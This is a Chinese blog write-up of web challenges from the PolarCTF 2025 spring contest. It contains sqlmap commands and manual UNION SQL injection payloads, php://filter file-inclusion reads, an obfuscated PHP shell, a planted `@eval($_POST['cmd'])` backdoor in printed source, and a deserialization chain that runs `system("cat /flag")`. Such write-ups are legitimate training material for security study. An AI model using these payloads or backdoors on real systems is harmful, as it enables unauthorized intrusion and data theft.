polar【2025春季个人挑战赛】(困难部分)

最新推荐文章于 2026-06-24 20:29:46 发布
原创 最新推荐文章于 2026-06-24 20:29:46 发布 · 881 阅读 · 7 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#python #php #前端

椰子树晕淡水鱼

看到三个交互点

提示是一个藏头诗,让我们进行文件包含

这两个页面用处不大,可以看到在路径中可以进行文件包含

我们扫一下目录看看有没有什么可以使用的信息

扫描目录可以看到,有上传页面推测需要文件上传

首先看看/password

需要密码

没有这方面的提示应该是4-6位的纯数字

ARCHPR,成功爆出

我们使用刚才的密码本进行爆破

成功爆破

是一个文件上传页面

上传一个木马

修改一下后缀

上传成功

成功获取flag

再给我30元

一道SQL注入题目

没有看到注入点,查看源码,看看有没有提示

在源码中给了提示

告诉我们使用id作为注入点

应该没有人会去扫吧?

我们使用SQLMAP进行注入

SQLMAP注入

python sqlmap.py -u "http://8267e77b-510a-41d
b-9ecb-423e1bef51b6.www.polarctf.com:8090/?id=0" -p id --level=5 --risk=3 --random-agent 
--url 的简写,指定目标注入点 URL
--param 的简写,明确告诉 sqlmap:只测试 id 这个参数是否可注入
检测深度,共 1~5 级,5 是最高级别
风险等级,共 1~3 级,3 是最高级别
每次请求都随机使用一个 User-Agent,用来绕过一些基于 UA 的简单 WAF 或限流规则

我们得到了列数为两列

数据库为MySQL

可用注入类型:布尔盲注、时间盲注、UNION 注入

python sqlmap.py -u "http://8267e77b-510a-41d
b-9ecb-423e1bef51b6.www.polarctf.com:8090/?id=0" -p id --level=5 --risk=3 --random-agent --union-cols=2
--union 注入类型
-cols 列数

对于这题没什么用,说一下可以减少等待的时间

python sqlmap.py -u "http://8267e77b-510a-41d
b-9ecb-423e1bef51b6.www.polarctf.com:8090/?id=0" -p id --level=5 --risk=3 --random-agent --technique=U --dbms=mysql \ --sql-query="UNION SELECT 1,group_cincat(schema_name) FROM information_schema.schemata"
--technique=U 只使用 UNION 注入
--dbms=mysql 直接声明后端是 MySQL
--sql-query="UNION SELECT 1,group_concat(schema_name) FROM information_schema.schemata" 直接执行指定的 SQL 查询(利用 UNION 注入)

可以看到直接把结果保存到了我们的目录下的文件夹

接下来爆破数据库

python sqlmap.py -u "http://8267e77b-510a-41d
b-9ecb-423e1bef51b6.www.polarctf.com:8090/?id=0" -p id --level=5 --risk=3 --random-agent --technique=U --dbms=mysql \ --sql-query="UNION SELECT 1,group_cincat(schema_name) FROM information_schema.schemata" -dump --dbms=mysql
-dump 执行完 --sql-query 后,继续把当前数据库的所有表、所有列、所有数据全部 dump 出来

正常SQL注入可以

手搓

?id=1 group by 2
?id=1 group by 3  #判断列数
?id=-1 union select version(),database()  #爆库
?id=-1 union select version(),(select group_concat(table_name) from information_schema.tables where table_schema=database())  #爆表
?id=-1 union select version(),(select group_concat(column_name) from information_schema.columns where table_name=0x757365725f696e666f)  #爆列
?id=-1 union select version(),(select group_concat(secret) from WelcomeSQL.user_info)  #爆字段

UNION 联合注入,SQLmap的使用

狗黑子CTF变强之路

信息收集

打开环境,页面是ctf变强之路,有三个按钮,随便点一个发现url后面拼上了/index.php?page=miji.php,修改page的值为flag.php无回显,修改为1回显只允许包含php文件,猜测是文件包含漏洞并且只能包含php文件,我们dirsearch扫一下

等待过程中看看还有没有什么信息

好的,没有

一个amin.php,但是我们没有账号和密码

第一种方法

我们利用php伪协议读取?page=php://filter/read=convert.base64-encode/resource=admin.php,解base64后得到一段源码

<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // 硬编码的用户名和密码
    $correctUsername = "ggouheizi";
    $correctPassword = "zigouhei";

    $username = $_POST['username'];
    $password = $_POST['password'];

    if ($username == $correctUsername && $password == $correctPassword) {
        // 登录成功,直接跳转到 gougougou.php
        header("Location: gougougou.php");
        exit;
    } else {
        $errorMessage = "用户名或密码错误,请重新输入。";
    }
}
?>

<!DOCTYPE html>
<html>

<head>
  <title>秘境遗迹</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f4f4;
    }

    form {
      background-color: white;
      padding: 20px;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
      width: 300px;
      position: absolute;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
    }

    label {
      display: block;
      margin-bottom: 5px;
      font-weight: bold;
    }

    input[type="text"],
    input[type="password"] {
      width: 100%;
      padding: 10px;
      margin-bottom: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      box-sizing: border-box;
      transition: border-color 0.3s ease;
    }

    input[type="text"]:focus,
    input[type="password"]:focus {
      border-color: #4CAF50;
    }

    input[type="submit"] {
      padding: 10px 20px;
      background-color: #4CAF50;
      color: white;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      transition: background-color 0.3s ease;
    }

    input[type="submit"]:hover {
      background-color: #45a049;
    }
  </style>
</head>

<body>
  <form method="post">
    <label for="username">用户名:</label><br>
    <input type="text" name="username"><br>
    <label for="password">密码:</label><br>
    <input type="password" name="password"><br><br>
    <input type="submit" value="登录">
    <?php if(isset($errorMessage)) { echo $errorMessage; }?>
  </form>
</body>

</html>

看到有gougougou.php,伪协议读取

<?php 
$gou1="8AZ1mha\vHTnv9k4yAcyPZj98gG47*yESyR3xswJcDD4J2DNar";
$gou2="bgW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09";
$gou3="tVXTklXR1prWVhWcCmNVZG5kMDV3ZEVsQ1MybEVjM2hOUlhweFFscHJUM1YzVldGVVMwWllVbVpNWjIxMlkyaGlhWEJaWkU1NVFVZHpTVmRXUlZGdWVHcEVVRzlJVTNSRFRVcHlaV3h0VFRscVYwRm1lSEZ1VkRKVldXcE1TMms1Y1hjeFJFWlpUa2xvWjFsU2MwUm9WVlpDZDBWWVIzWkZOMGhOT0N0UGVEMDk=";
$gou4=$gou1{20}.$gou1{41}.$gou1{13}.$gou1{38}.$gou1{6}.$gou1{9}.$gou1{1}.$gou1{25}.$gou1{2};
$gou5=$gou2{30}.$gou2{27}.$gou2{51}.$gou2{0}.$gou2{44}.$gou2{1}.$gou2{28}.$gou2{30}.$gou2{79}.$gou2{87}.$gou2{61}.$gou2{61}.$gou2{79};
$gou6=$gou1{34}.$gou3{36}.$gou1{39}.$gou3{41}.$gou1{47}.$gou3{0}.$gou3{20}.$gou3{16}.$gou3{62}.$gou3{62}.$gou3{159}.$gou3{3}.$gou1{37}.$gou3{231};
#$gou7=Z291MnsxN30uZ291MXs4fS5nb3U0ezR9LmdvdTV7MTJ9KCRnb3U0LiRnb3U1LiRnb3U2KQ==;
?>

这是一段典型的 PHP 混淆壳(“狗壳”、“gou壳”)

我们对$gou7进行base64解码,再将\v换成1v,gou1中的\v可能被认为是一个字符,因为\是转义符,所以把\换成其他可识别字符再解,得到gou7的真实值

<?php 
  $gou1="8AZ1mhavHTnv9k4yAcyPZj98gG47*yESyR3xswJcDD4J2DNar";
$gou2="bgW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09";
$gou3="tVXTklXR1prWVhWcCmNVZG5kMDV3ZEVsQ1MybEVjM2hOUlhweFFscHJUM1YzVldGVVMwWllVbVpNWjIxMlkyaGlhWEJaWkU1NVFVZHpTVmRXUlZGdWVHcEVVRzlJVTNSRFRVcHlaV3h0VFRscVYwRm1lSEZ1VkRKVldXcE1TMms1Y1hjeFJFWlpUa2xvWjFsU2MwUm9WVlpDZDBWWVIzWkZOMGhOT0N0UGVEMDk=";
$gou4=$gou1{20}.$gou1{41}.$gou1{13}.$gou1{38}.$gou1{6}.$gou1{9}.$gou1{1}.$gou1{25}.$gou1{2};
$gou5=$gou2{30}.$gou2{27}.$gou2{51}.$gou2{0}.$gou2{44}.$gou2{1}.$gou2{28}.$gou2{30}.$gou2{79}.$gou2{87}.$gou2{61}.$gou2{61}.$gou2{79};
$gou6=$gou1{34}.$gou3{36}.$gou1{39}.$gou3{41}.$gou1{47}.$gou3{0}.$gou3{20}.$gou3{16}.$gou3{62}.$gou3{62}.$gou3{159}.$gou3{3}.$gou1{37}.$gou3{231};
#$gou7=Z291MnsxN30uZ291MXs4fS5nb3U0ezR9LmdvdTV7MTJ9KCRnb3U0LiRnb3U1LiRnb3U2KQ==;
$gou8=$gou2{17}.$gou1{8}.$gou4{4}.$gou5{12}.($gou4.$gou5.$gou6);
echo $gou8;
?>

可以看到,这里有一个木马

我们可以直接进行命令执行

还有一种方法

直接伪协议读取index.php

<?php
if (isset($_GET['page'])) {
    $page = $_GET['page'];
    // 简单的文件类型检查,只允许包含 php 文件
    if (strpos($page, '.php')!== false) {
        include($page);
    } else {
        echo "只允许包含 php 文件";
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>狗黑子的小破站</title>
    <style>
        body {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            margin: 0;
        }
    .button {
            display: inline - block;
            padding: 10px 20px;
            margin: 10px;
            background-color: #4CAF50;
            color: white;
            text-decoration: none;
            border-radius: 5px;
        }
    .button:hover {
            background-color: #45a049;
        }
        #content {
            display: flex;
            flex-direction: column;
            align-items: center;
        }
    </style>
</head>
<body>
    <h1>欢迎来到 CTF 变强之路</h1>
    <div id="content">
        <form action="index.php" method="get">
            <input type="hidden" name="page" value="miji.php">
            <input type="submit" value="秘籍" class="button">
        </form>
        <form action="index.php" method="get">
            <input type="hidden" name="page" value="fabao.php">
            <input type="submit" value="法宝" class="button">
        </form>
        <form action="index.php" method="get">
            <input type="hidden" name="page" value="jinshouzhi.php">
            <input type="submit" value="金手指" class="button">
        </form>
    </div>
    <?php
    if (isset($_GET['page'])) {
        echo '<div id="display">';
    }
 ?>
</body>
</html>
<?php @eval($_POST['cmd'])?>

在这里也有木马

伪协议包含+命令执行

小白说收集很重要

题目提示为需要信息收集,我们先来进行信息收集

信息收集

我们进行扫描

/flag.php

/login.php

检测登录的页面

/upload_file.php

上传文件的路径

/users.json

在这里存在,登录的密码

我们先登录看看,有什么信息

继续信息收集

都是一些学习知识

应该是在这里登录admin

经过测试,在短语中的信息是构造密码的关键

复制全部密码,进行爆破

成功爆出admin的账户

sysadmin

xiaobai

成功登录

命令执行

ls

cat /flag

文件上传

想试试可不可以进行文件上传,但是上传什么文件都是报错

反序列化

<?php
  class Boss {
  public $king;
function __destruct() {
  $this->funnn();
}
function funnn() {
  $this->king->close();
}
}
class Staff {
  public $man;
  function close() {
    eval($this->man);
  }
}
if (isset($_GET['data'])) {
  $user_data = unserialize($_GET['data']);
}
  ?>

链子很简单,但是反序列化失败

<?php
  class Boss {
  public $king;
function __destruct() {
  $this->funnn();
}
function funnn() {
  $this->king->close();
}
}
class Staff {
  public $man;
  function close() {
    eval($this->man);
  }
}
$a = new Boss();
$a->king = new Staff();
$a->king->man = 'system("cat /flag");';
echo serialize($a);
  ?>

没明白,是没有做还是我的方法有问题

信息收集,文件上传,命令执行,反序列化

fengci.
关注
Polar 2024春季个人挑战赛 Jay17 WP
Jay17的博客
03-24 2431
Polar 2024春季个人挑战赛 Jay17 WP Rank 7
2025PolarCTF秋季个人】WEB方向wp
Python1111111的博客
09-20 1454
摘要: 本文记录了多个CTF题目的解题思路和过程。1)"white"靶机通过白名单命令绕过过滤,利用未过滤的管道符拼接base64编码命令获取flag;2)"俄罗斯方块"游戏通过修改分数触发隐藏路由获取flag;3)"狗黑子的舔狗日记"通过文件读取漏洞获取源码中的base64加密flag,爆破密码后登录获取最终flag;4)"VIP"题目通过修改POST参数vipStatus获取权限;5)"polar快递"利
PolarCTF网络安全2025春季个人挑战赛个人WP
qq_63923205的博客
03-22 2376
polarctf2025春季个人wp
PolarCTF网络安全2025春季个人挑战赛 web方向个人wp
Python1111111的博客
03-26 1566
打开环境,页面是ctf变强之路,有三个按钮,随便点一个发现url后面拼上了/index.php?发现好几个文件,尝试直接访问flag.php,不出意外肯定是打不开的,我们尝试访问/login.php,发现被forbidden了打不开,再看/upload_file.php,没啥用,再看最后一个/users.json,发现是一堆用户名密码,随便用一个登录。打开环境,是一个输入框,提示是执行命令的地方,尝试ls /发现回显no,猜测是被过滤了,我们dirsearch扫一下。
PolarCTF2025春季个人挑战赛 题讲解
小杉泽的博客
04-22 1079
如果byteorder='big',则是正常顺序,低位在前,高位在后。其次,第二句话为:在主个世界中确定的一个点,可以映射到相对的世界,给出的密文是六位数字,所以说咱们每一个数字对应一个世界,也就是一个平面,也就是:8->一世界,6->二世界,4->三世界,5->四世界,1->五世界,3->六世界。六方世界,可以是六个区域,两两平行,相互交错,且题目为“solid”为立体的意思,所以我们可以把这个表格中特定的六个区域进行空间折叠,形成一个立体图形,而有六个面的立体图形,为正方体和长方体。
Python图片压缩方法全解:从入门到进阶
得塔云的博客
06-19 805
本文总结了Python中六种主流的图片压缩方法:1)Pillow作为通用首选,支持质量调整、尺寸缩放和格式转换;2)TinyPNG API提供最高压缩率但有限额;3)WebP格式在保持画质下体积最小;4)PyVips适合大图处理,内存占用低;5)OpenCV针对视频帧和实时流优化;6)K-means聚类实现算法级色彩压缩。文章通过对比表格和决策树,建议根据场景需求选择工具,日常使用Pillow即可满足大多数需求,并附赠了一个可直接使用的批量压缩脚本。
Unity PICO4 学习记录8: WebRTC
m0_63485455的博客
06-22 498
这一篇和PICO本身没什么关系,只是记录一下开发过程我们要做一个“从超声设备采集影像数据,一对多地传给XR眼镜终端以及其他可能的设备”应用。发送端是Jetson,由同事负责;接收端XR眼镜端由我负责。同事说视频采集卡例程里给了两种通信协议:RSTP和WebRTC.一开始我尝试用HoloLens2,因为老师和医生们似乎更喜欢OST而不是VST;但是UWP ARM64 媒体栈对 RTSP 支持弱、MixedReality-WebRTC 停更,所以 HL2 不适合当主验证平台。
将datafram写入到csv文件中.添加行,添加列,重建索引。
m0_63525799的博客
06-24 437
操作最常用写法加列df['C'] = 值加行df.loc['新行'] = 值或重置索引设索引df.set_index('列名')
Odoo 19开发教程之视图控件开发
智能化技术分享
06-22 324
本文详细介绍了Odoo 19中自定义视图控件的开发方法,通过一个销售订单列表视图的弹窗控件案例,展示了完整的实现流程。该控件由四部分组成:基于OWL框架的JavaScript组件(包含弹窗和主控件)、XML模板文件(定义界面元素)、Python模型(提供计算字段)和视图XML定义(嵌入控件)。开发要点包括使用usePopover钩子实现弹窗交互、OWL组件与模板的绑定方式、计算字段的高效实现,以及控件在视图中的注册与调用。该方案可灵活扩展,为Odoo视图提供丰富的交互功能。
一个简单的模拟宇宙——基于NKS理论的3D元胞自动机
神棍之路
06-24 342
这是一个基于NKS(一种新科学)思想的3D元胞自动机模拟器。它使用实现,你可以在三维网格中探索简单规则如何产生复杂结构。
Python办公03:格式魔术师——批量统一 Excel 标题行、字体与边框设置
weixin_42636075的博客
06-19 269
本文介绍了使用Python的openpyxl库批量格式化Excel文件的方法。通过定义标题行样式(蓝色背景、加粗字体)、数据行样式(细边框、自动对齐)和自动调整列宽等操作,实现报表格式的自动化统一。文章提供了完整的代码实现,包括单个文件格式化和批量处理功能,并详细解析了代码中的样式对象定义、数据范围获取、列宽调整等关键步骤。该方案可将50份报表的处理时间从4小时缩短至10秒,大幅提升办公效率。代码支持自定义输出路径、自动识别文本/数字对齐方式,并包含冻结首行等实用功能。
PyCharm调试技术与最佳实践指南
weixin_51955414的博客
06-23 423
《PyCharm调试技术与最佳实践指南》摘要 本文系统介绍了PyCharm调试功能的使用方法,包含以下核心内容: 调试基础:解释了调试概念、重要性和不同类型(断点/条件断点/日志/远程调试) 界面详解:展示了调试工具栏功能和窗口布局,包括代码编辑器、变量面板和控制台等组件 断点管理:详细说明基本断点、条件断点、临时断点、日志断点的设置方法及分组管理技巧 调试操作:讲解Step Over(F8)、Step Into(F7)、Step Out(Shift+F8)等关键调试命令 变量处理.
详解信号量使用红线:Django Signals 的适用场景与反模式
数据知道的博客
06-24 87
Django 信号机制通过观察者模式实现模块解耦,允许在特定操作(如模型保存)时触发回调函数。本文剖析了其核心原理、适用场景及潜在陷阱: 本质与原理 信号是同步执行的,会阻塞主线程,非异步任务 由Sender、Signal、Receiver三部分组成,通过维护接收者列表实现同步调用 适用场景 解耦核心与非核心业务(如注册后发邮件) 第三方库扩展接口(如订单创建后ERP同步) 跨模型数据同步(冗余字段更新) 审计日志记录 使用红线 避免在接收者中重复触发save()导致递归死循环 警惕耗时操作(网络请求
神经网络 | ⑤ MNIST 手写数字识别的 FCNN 推理实现
06-23 199
本文实现了一个基于MNIST手写数字数据集的三层全连接神经网络(FCNN)推理系统。该系统通过加载预训练权重参数,能够对28×28像素的手写数字图像进行分类识别。网络结构包含784个输入神经元、两个隐藏层(50和100个神经元)和10个输出神经元,使用Sigmoid和Softmax作为激活函数。文章详细介绍了数据集特征、网络设计思路以及前向传播的计算流程,最终实现了93.52%的测试准确率。该实现为深度学习入门项目,展示了神经网络的基本推理过程。
自定义ESP32-S3开发板适配ESP-WHO框架
91创客学堂
06-23 439
本文介绍了ESP-WHO边缘机器视觉框架在ESP32-S3芯片上的部署与移植方案。主要内容包括:1. ESP-WHO框架概述及示例编译流程,支持人脸识别、物体检测等功能;2. 第三方ESP32-S3开发板与官方ESP32-S3-EYE的硬件差异分析;3. 详细移植步骤:修改LCD引脚配置(SPI模式改为0、背光GPIO调整)、OV3660摄像头驱动适配、关键menuconfig配置(PSRAM设置、模型存储位置等);4. 最小化应用代码示例及常见问题解决方法。
第5篇_Python文件操作与异常处理:程序与外界交互的桥梁
Lenyiin
06-22 954
学到这里,你的 Python 代码已经能在自由运转了——变量、函数、类、对象,全都在 RAM 里运行,程序结束就消失。但真实世界的程序,不能只活在内存里。这就需要掌握和——这是 Python 程序与外界交互的两座桥梁。本篇我们就来系统学习这两个主题。
批量图片处理工具
最新发布
vx_ python5225 博客
06-24 198
【代码】批量图片处理工具。
并行推理模型设计研究报告
东方佑
06-22 484
问题: NAR 并行预测 L 个 token → 目标分布高度多模态 → CE 最小化塌缩到众数(所有位置输出 "的" → CE 最小, 但完全无用)修复: 序列级知识蒸馏1. AR 教师对每个前缀贪心续写 → 得到 L 个"确定"的 token2. 教师序列消除了多模态 (每个前缀只有 1 个教师续写)3. NAR 学习教师的确定序列 → 不再塌缩 → 输出多样化为什么教师必须"刚刚好":- 教师太弱 (2 epoch): 教师自己也塌缩 → NAR 匹配好但质量差。
从零搭建一个 Web 目录扫描器(Python + FastAPI)
2503_94020569的博客
06-18 54
第一次做算小工具的完整项目,来练手感觉还不是很完善用法可以看readme.md(应该没人会用,dirsearch好用的多)不过可以看看源码。
Python:第12天:模块与包 —— 站在巨人的肩膀上
天佑木枫
06-24 166
本文介绍了Python模块与包的基本概念和使用方法:1. 模块是包含函数/变量/类的.py文件,包是包含多个模块的文件夹(需含__init__.py)。2. 三种模块导入方式:- import 模块名(需用模块名调用) from 模块名 import 函数名(直接调用) import 模块名 as 别名(推荐)3. 常用标准库:random(随机数)、math(数学运算)、datetime(日期时间)、os(系统操作)等。4. 通过pip安装第三方库(如requests、openpyxl),并演示了网络请求
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值